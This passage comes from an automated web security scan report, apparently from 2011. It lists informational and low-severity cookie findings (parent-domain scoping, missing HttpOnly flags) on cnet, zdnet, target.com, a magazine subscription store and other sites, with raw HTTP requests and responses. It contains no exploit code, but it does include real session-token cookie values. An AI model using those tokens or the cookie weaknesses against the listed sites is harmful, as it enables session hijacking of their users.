User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.18. http://download.cnet.com/8301-2007_4-20027809-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.19. http://download.cnet.com/8301-2007_4-20027809-12.html-- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html--

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html-- HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.20. http://download.cnet.com/8301-2007_4-20027865-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027865-12.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027865-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.21. http://download.cnet.com/download-blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/download-blog/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download-blog/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.22. http://download.cnet.com/mac/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/mac/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mac/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.23. http://download.cnet.com/mobile-downloads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/mobile-downloads/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile-downloads/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.24. http://download.cnet.com/webware-apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/webware-apps/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware-apps/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.25. http://download.cnet.com/windows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/windows/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.26. http://landesm.gfi.com/event-log-analysis-sm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://landesm.gfi.com
Path:	/event-log-analysis-sm/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.27. http://www.zdnet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zdnet.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11. Cookie without HttpOnly flag set previous next
There are 63 instances of this issue:

http://weeklyad.target.com/target/default.aspx
http://www.43things.com/person/
http://www.admob.com/
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired
http://www.sentinelinvestments.com/
http://www.tukui.org/v2/forums/register.php
http://www.walmart.com/x22
http://www.wired.com/services/corrections/
http://www.wired.com/services/newsletters
http://www.wired.com/user/login
http://www.wired.com/user/logout
http://www.wired.com/user/registration
http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json
http://ad.doubleclick.net/activity
http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel
http://ad.doubleclick.net/clk
http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel
http://ad.insightexpressai.com/adserver/adServer.aspx
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317
http://b.scorecardresearch.com/b
http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp
http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://digg.com/submit
http://download.cnet.com/1770-20_4-0.html
http://download.cnet.com/8300-2007_4-12.xml
http://download.cnet.com/8301-2007_4-20015771-12.html
http://download.cnet.com/8301-2007_4-20027809-12.html
http://download.cnet.com/8301-2007_4-20027809-12.html--
http://download.cnet.com/8301-2007_4-20027865-12.html
http://download.cnet.com/download-blog/
http://download.cnet.com/mac/
http://download.cnet.com/mobile-downloads/
http://download.cnet.com/webware-apps/
http://download.cnet.com/windows/
http://landesm.gfi.com/event-log-analysis-sm/
http://www.addthis.com/bookmark.php
http://www.ccmaine.net/
http://www.zdnet.com/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://weeklyad.target.com/target/default.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://weeklyad.target.com
Path:	/target/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SLHTrackingSessionID=11011122161102414320608630494S; expires=Wed, 12-Jan-2011 04:46:11 GMT; path=/
SLHUID=UID=11011122161102414320608630493S&Version=1.65; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Prefs=LanguageID=1&SiteID=787&PRetailerID=-99880&OnlineServer=&OnlineSID=&tag=tcom-gbexpo71-20; path=/
SLHCookie=LanguageID=1; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
DisplayMode=preferred=flash; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /target/default.aspx HTTP/1.1
Host: weeklyad.target.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: /target/default.aspx?action=entryflash&
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 166
Expires: Wed, 12 Jan 2011 04:16:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 04:16:11 GMT
Connection: close
Set-Cookie: SLHUID=UID=11011122161102414320608630493S&Version=1.65; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: ShoppingListCount=0; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: ShoppingList=; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: SLHTrackingSessionID=11011122161102414320608630494S; expires=Wed, 12-Jan-2011 04:46:11 GMT; path=/
Set-Cookie: Prefs=LanguageID=1&SiteID=787&PRetailerID=-99880&OnlineServer=&OnlineSID=&tag=tcom-gbexpo71-20; path=/
Set-Cookie: SLHCookie=LanguageID=1; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: DisplayMode=preferred=flash; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftarget%2fdefault.aspx%3faction%3dentryflash%26">here</a>.</h2>
</body></html>

11.2. http://www.43things.com/person/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.43things.com
Path:	/person/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://www.admob.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.admob.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
